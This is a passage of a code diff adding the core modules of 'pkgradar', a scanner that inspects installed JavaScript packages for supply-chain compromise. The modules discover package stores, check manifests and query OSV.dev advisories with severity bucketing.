function checkManifestAnomalies(pkg) {
  const out = [];
  const m = pkg.manifest || {};
  // bin pointing outside the package, or to a shell script
  if (m.bin) {
    const bins = typeof m.bin === 'string' ? { [m.name]: m.bin } : m.bin;
    for (const [k, v] of Object.entries(bins)) {
      if (typeof v === 'string' && (v.includes('..') || /\.(sh|bat|cmd|ps1)$/.test(v))) {
        out.push({ sev: SEV.MEDIUM, code: 'odd-bin', msg: `bin "${k}" -> ${v}`, evidence: 'package.json#bin' });
      }
    }
  }
  return out;
}

function runAll(pkg) {
  const findings = [];
  for (const fn of [checkLifecycleHooks, checkWormFiles, checkManifestAnomalies, checkObfuscation]) {
    try { findings.push(...fn(pkg)); } catch (e) { /* ignore per-check failure */ }
  }
  return findings;
}

module.exports = { runAll, SEV };
package/lib/osv.js
ADDED
@@ -0,0 +1,100 @@
'use strict';
// Optional online cross-reference against OSV.dev — precise (package, version) matching,
// no API key. Used only when --online is passed. Two phases:
//   1. /v1/querybatch — fast: which (name@version) have advisories at all
//   2. /v1/query      — for just those packages, fetch full vuln objects so we can
//      read each advisory's real severity instead of blanket-HIGH.
const https = require('https');

function request(method, host, pathname, body) {
  return new Promise((resolve, reject) => {
    const data = body ? Buffer.from(JSON.stringify(body)) : null;
    const headers = data ? { 'content-type': 'application/json', 'content-length': data.length } : {};
    const req = https.request({ host, path: pathname, method, headers }, (res) => {
      const chunks = [];
      res.on('data', (c) => chunks.push(c));
      res.on('end', () => {
        const txt = Buffer.concat(chunks).toString('utf8');
        if (res.statusCode >= 400) return reject(new Error(`OSV ${res.statusCode} ${pathname}`));
        try { resolve(JSON.parse(txt)); } catch (e) { reject(e); }
      });
    });
    req.on('error', reject);
    req.setTimeout(15000, () => req.destroy(new Error('OSV request timed out')));
    if (data) req.end(data); else req.end();
  });
}

// CVSS v3 vector -> approximate numeric base score is non-trivial; instead bucket by the
// vector's impact + exploitability shape. Good enough to pick LOW/MEDIUM/HIGH/CRITICAL.
function bucketFromCvssVector(vec) {
  if (!vec || typeof vec !== 'string') return null;
  const m = Object.fromEntries(vec.split('/').map((p) => p.split(':')).filter((a) => a.length === 2));
  const impactHigh = ['C', 'I', 'A'].filter((k) => m[k] === 'H').length;
  const network = m.AV === 'N';
  const noPriv = m.PR === 'N' || m.PR === undefined;
  const noUI = m.UI === 'N' || m.UI === undefined;
  if (impactHigh >= 2 && network && noPriv && noUI) return 'CRITICAL';
  if (impactHigh >= 1 && network && noPriv) return 'HIGH';
  if (impactHigh >= 1) return 'MEDIUM';
  return 'LOW';
}
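// Worked example: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" (the classic 9.8)
// parses to AV=N, PR=N, UI=N with three High impacts -> 'CRITICAL' here as well.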

function severityOfVuln(v) {
  const ds = v.database_specific && (v.database_specific.severity || v.database_specific.cvss);
  if (typeof ds === 'string') {
    const s = ds.toUpperCase();
    if (s.startsWith('CRIT')) return 'CRITICAL';
    if (s === 'HIGH') return 'HIGH';
    if (s === 'MODERATE' || s === 'MEDIUM') return 'MEDIUM';
    if (s === 'LOW') return 'LOW';
  }
  for (const s of v.severity || []) {
    if (typeof s.score === 'string') {
      const num = parseFloat(s.score);
      if (!Number.isNaN(num) && /^\d/.test(s.score.trim())) {
        if (num >= 9) return 'CRITICAL';
        if (num >= 7) return 'HIGH';
        if (num >= 4) return 'MEDIUM';
        return 'LOW';
      }
      const b = bucketFromCvssVector(s.score);
      if (b) return b;
    }
  }
  return 'MEDIUM'; // unknown -> don't over- or under-claim
}

// pkgs: [{name, version}]. Returns Map "name@version" -> [{ id, severity, summary }]
async function queryOSV(pkgs) {
  const uniq = new Map();
  for (const p of pkgs) if (p.name && p.version) uniq.set(`${p.name}@${p.version}`, p);
  const entries = [...uniq.values()];

  // phase 1: which entries have anything
  const affected = [];
  for (let i = 0; i < entries.length; i += 900) {
    const batch = entries.slice(i, i + 900);
    const resp = await request('POST', 'api.osv.dev', '/v1/querybatch', {
      queries: batch.map((p) => ({ package: { ecosystem: 'npm', name: p.name }, version: p.version })),
    });
    (resp.results || []).forEach((r, idx) => { if ((r.vulns || []).length) affected.push(batch[idx]); });
  }

  // phase 2: full details for affected packages only (bounded concurrency)
  const result = new Map();
  const queue = affected.slice();
  const worker = async () => {
    for (let p; (p = queue.shift()); ) {
      try {
        const resp = await request('POST', 'api.osv.dev', '/v1/query', { package: { ecosystem: 'npm', name: p.name }, version: p.version });
        const vulns = (resp.vulns || []).map((v) => ({ id: v.id, severity: severityOfVuln(v), summary: v.summary || '' }));
        if (vulns.length) result.set(`${p.name}@${p.version}`, vulns);
      } catch { /* skip this one */ }
    }
  };
  await Promise.all(Array.from({ length: Math.min(8, queue.length) }, worker));
  return result;
}

module.exports = { queryOSV };
package/lib/scan.js
ADDED
@@ -0,0 +1,86 @@
'use strict';
const { discoverStores, packagesInStore } = require('./stores');
const { runAll, SEV } = require('./checks');
const { queryOSV } = require('./osv');

const SEV_NAME = { 4: 'CRITICAL', 3: 'HIGH', 2: 'MEDIUM', 1: 'LOW', 0: 'INFO' };

let ALLOW_EXACT = new Set(), ALLOW_SCOPES = [];
try {
  const a = require('../data/allowlist.json');
  for (const n of a.names || []) { if (n.endsWith('/*')) ALLOW_SCOPES.push(n.slice(0, -1)); else ALLOW_EXACT.add(n); }
} catch { /* allowlist optional */ }
function isAllowlisted(name) {
  if (ALLOW_EXACT.has(name)) return true;
  return ALLOW_SCOPES.some((s) => name.startsWith(s));
}

async function scan(opts = {}) {
  const cwd = opts.cwd || process.cwd();
  const stores = discoverStores(cwd);
  const kindFilter = Array.isArray(opts.stores) && opts.stores.length ? new Set(opts.stores) : null;
  const storeStats = [];
  const seen = new Map(); // "name@version@dir" -> pkg (dedupe)
  const findings = [];
  const allPkgList = [];

  for (const store of stores) {
    if (kindFilter && !kindFilter.has(store.kind)) continue;
    let count = 0;
    for (const pkg of packagesInStore(store, { maxDepth: opts.maxDepth })) {
      count++;
      const key = `${pkg.name}@${pkg.version}@${pkg.dir || store.root}`;
      if (seen.has(key)) continue;
      seen.set(key, pkg);
      allPkgList.push({ name: pkg.name, version: pkg.version });
      if (pkg.archiveOnly) continue; // can't inspect bytes inside a yarn-berry zip
      const allow = !opts.noAllowlist && isAllowlisted(pkg.name);
      for (const f of runAll(pkg)) {
        let sev = f.sev, note;
        // allowlist downgrades benign-looking findings — but NEVER suppresses a hard worm
        // IOC (worm-ioc-file / CRITICAL suspicious-js), since that's the compromise case.
        if (allow && sev < SEV.CRITICAL) { sev = SEV.INFO; note = 'allowlisted package, heuristic likely benign; review only if context warrants'; }
        if (sev < (opts.minSev ?? SEV.MEDIUM)) continue;
        findings.push({
          severity: SEV_NAME[sev], sevNum: sev, code: f.code, message: f.msg, evidence: f.evidence,
          package: pkg.name, version: pkg.version, store: store.kind, dir: pkg.dir, note,
        });
      }
    }
    storeStats.push({ kind: store.kind, root: store.root, note: store.note, packages: count });
  }

  let osv = null;
  if (opts.online) {
    try {
      const map = await queryOSV(allPkgList);
      osv = [];
      const SEV_RANK = { CRITICAL: SEV.CRITICAL, HIGH: SEV.HIGH, MEDIUM: SEV.MEDIUM, LOW: SEV.LOW };
      for (const [nv, vulns] of map) {
        const [name, version] = splitNV(nv);
        const top = vulns.reduce((m, v) => Math.max(m, SEV_RANK[v.severity] ?? SEV.MEDIUM), SEV.LOW);
        const bySev = {};
        for (const v of vulns) bySev[v.severity] = (bySev[v.severity] || 0) + 1;
        const breakdown = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'].filter((k) => bySev[k]).map((k) => `${bySev[k]} ${k.toLowerCase()}`).join(', ');
        const ids = vulns.map((v) => v.id);
        findings.push({
          severity: SEV_NAME[top], sevNum: top, code: 'osv-advisory',
          message: `${vulns.length} OSV ${vulns.length === 1 ? 'advisory' : 'advisories'} (${breakdown}): ${ids.slice(0, 8).join(', ')}${ids.length > 8 ? ', …' : ''}`,
          evidence: 'https://osv.dev/' + ids.find((id) => vulns.find((v) => v.id === id && SEV_RANK[v.severity] === top)),
          package: name, version, store: 'registry', dir: null,
        });
        osv.push({ package: name, version, advisories: vulns });
      }
    } catch (e) {
      osv = { error: e.message };
    }
  }

  findings.sort((a, b) => b.sevNum - a.sevNum || a.package.localeCompare(b.package));
  const totalPackages = [...new Set(allPkgList.map((p) => `${p.name}@${p.version}`))].length;
  return { cwd, stores: storeStats, totalPackages, totalScanned: seen.size, findings, osv };
}

function splitNV(nv) { const i = nv.lastIndexOf('@'); return [nv.slice(0, i), nv.slice(i + 1)]; }
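// e.g. splitNV('@scope/pkg@1.2.3') -> ['@scope/pkg', '1.2.3']; lastIndexOf keeps
// a scoped name's leading '@' out of the split.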

module.exports = { scan, SEV };
package/lib/stores.js
ADDED
@@ -0,0 +1,96 @@
'use strict';
// Discover every place a JS package manager leaves extracted package code, and
// iterate the packages found there.
const fs = require('fs');
const path = require('path');
const os = require('os');
const cp = require('child_process');

const exists = (p) => { try { fs.accessSync(p); return true; } catch { return false; } };
const readdir = (p) => { try { return fs.readdirSync(p, { withFileTypes: true }); } catch { return []; } };
const sh = (cmd) => { try { return cp.execSync(cmd, { stdio: ['ignore', 'pipe', 'ignore'] }).toString().trim(); } catch { return ''; } };

function discoverStores(cwd) {
  const home = os.homedir();
  const out = [];
  const add = (kind, root, note) => { if (exists(root)) out.push({ kind, root, note }); };

  add('project', path.join(cwd, 'node_modules'), 'current project node_modules');
  add('pnpm-project', path.join(cwd, 'node_modules', '.pnpm'), 'pnpm in-project store');
  const g = sh('npm root -g'); if (g) add('npm-global', g, 'npm global packages');
  add('npx-cache', path.join(home, '.npm', '_npx'), 'npx ephemeral installs');
  add('bun-cache', path.join(home, '.bun', 'install', 'cache'), 'bun global cache');
  add('bun-cache', path.join(home, '.cache', 'bun', 'install', 'cache'), 'bun cache (xdg)');
  for (const p of [
    path.join(home, 'Library', 'pnpm', 'store'),
    path.join(home, '.local', 'share', 'pnpm', 'store'),
    process.env.PNPM_HOME && path.join(process.env.PNPM_HOME, 'store'),
  ].filter(Boolean)) add('pnpm-store', p, 'pnpm global content store (count only)');
  const yc = sh('yarn cache dir'); if (yc) add('yarn-cache', yc, 'yarn v1 cache');
  add('yarn-berry', path.join(cwd, '.yarn', 'cache'), 'yarn berry zip cache (names only)');
  return out;
}

function readManifest(dir) {
  try { return JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8')); } catch { return null; }
}
function pkgFromDir(dir, store) {
  const m = readManifest(dir);
  if (!m) return null;
  return { name: m.name || path.basename(dir), version: m.version || '', dir, store, manifest: m };
}

function* walkTree(nmDir, store, maxDepth, depth = 0) {
  if (depth > maxDepth || !exists(nmDir)) return;
  for (const ent of readdir(nmDir)) {
    if (ent.name.startsWith('.')) continue;
    const full = path.join(nmDir, ent.name);
    if (ent.name.startsWith('@')) {
      for (const sub of readdir(full)) {
        const d = path.join(full, sub.name);
        const p = pkgFromDir(d, store); if (p) yield p;
        yield* walkTree(path.join(d, 'node_modules'), store, maxDepth, depth + 1);
      }
    } else {
      const p = pkgFromDir(full, store); if (p) yield p;
      yield* walkTree(path.join(full, 'node_modules'), store, maxDepth, depth + 1);
    }
  }
}

function* packagesInStore(store, opts = {}) {
  const maxDepth = opts.maxDepth || 12;
  switch (store.kind) {
    case 'bun-cache': {
      for (const ent of readdir(store.root)) {
        if (!ent.isDirectory() || ent.name === '.bin' || ent.name === '.cache') continue;
        const full = path.join(store.root, ent.name);
        if (ent.name.startsWith('@')) {
          for (const sub of readdir(full)) if (sub.isDirectory()) { const p = pkgFromDir(path.join(full, sub.name), store); if (p) yield p; }
        } else { const p = pkgFromDir(full, store); if (p) yield p; }
      }
      return;
    }
    case 'yarn-berry': {
      for (const ent of readdir(store.root)) {
        if (ent.isFile() && ent.name.endsWith('.zip')) {
          const m = ent.name.match(/^(.*)-npm-(.+)-[a-f0-9]{8,}\.zip$/);
          if (m) yield { name: m[1].replace(/^@([^-]+)-/, '@$1/'), version: m[2], dir: null, store, archiveOnly: true };
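          // e.g. an entry named "@babel-core-npm-7.23.0-abcdef1234.zip" (illustrative
          // filename) parses to name "@babel/core", version "7.23.0".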
        }
      }
      return;
    }
    case 'pnpm-store': return; // content-addressed blobs; not extracted trees
    case 'npx-cache':
    case 'pnpm-project': {
      for (const ent of readdir(store.root)) {
        if (ent.isDirectory()) yield* walkTree(path.join(store.root, ent.name, 'node_modules'), store, maxDepth);
      }
      return;
    }
    default: // project, npm-global, yarn-cache
      yield* walkTree(store.root, store, maxDepth);
  }
}

module.exports = { discoverStores, packagesInStore, exists, readdir };
package/package.json
ADDED
@@ -0,0 +1,44 @@
{
  "name": "pkgradar",
  "version": "0.1.0",
  "description": "Content-based supply-chain scanner for npm/pnpm/yarn/bun: inspects the bytes you actually installed (lifecycle hooks, obfuscated payloads, worm IOCs) instead of just matching package names against an advisory list.",
  "bin": {
    "pkgradar": "bin/pkgradar.js"
  },
  "type": "commonjs",
  "files": [
    "bin/",
    "lib/",
    "data/",
    "README.md"
  ],
  "engines": {
    "node": ">=18"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/nilaydown/pkgradar.git"
  },
  "homepage": "https://github.com/nilaydown/pkgradar#readme",
  "bugs": {
    "url": "https://github.com/nilaydown/pkgradar/issues"
  },
  "author": "nilaydown",
  "scripts": {
    "test": "node test/smoke.js"
  },
  "keywords": [
    "supply-chain",
    "security",
    "npm",
    "pnpm",
    "yarn",
    "bun",
    "malware",
    "shai-hulud",
    "audit",
    "scanner"
  ],
  "license": "MIT",
  "dependencies": {}
}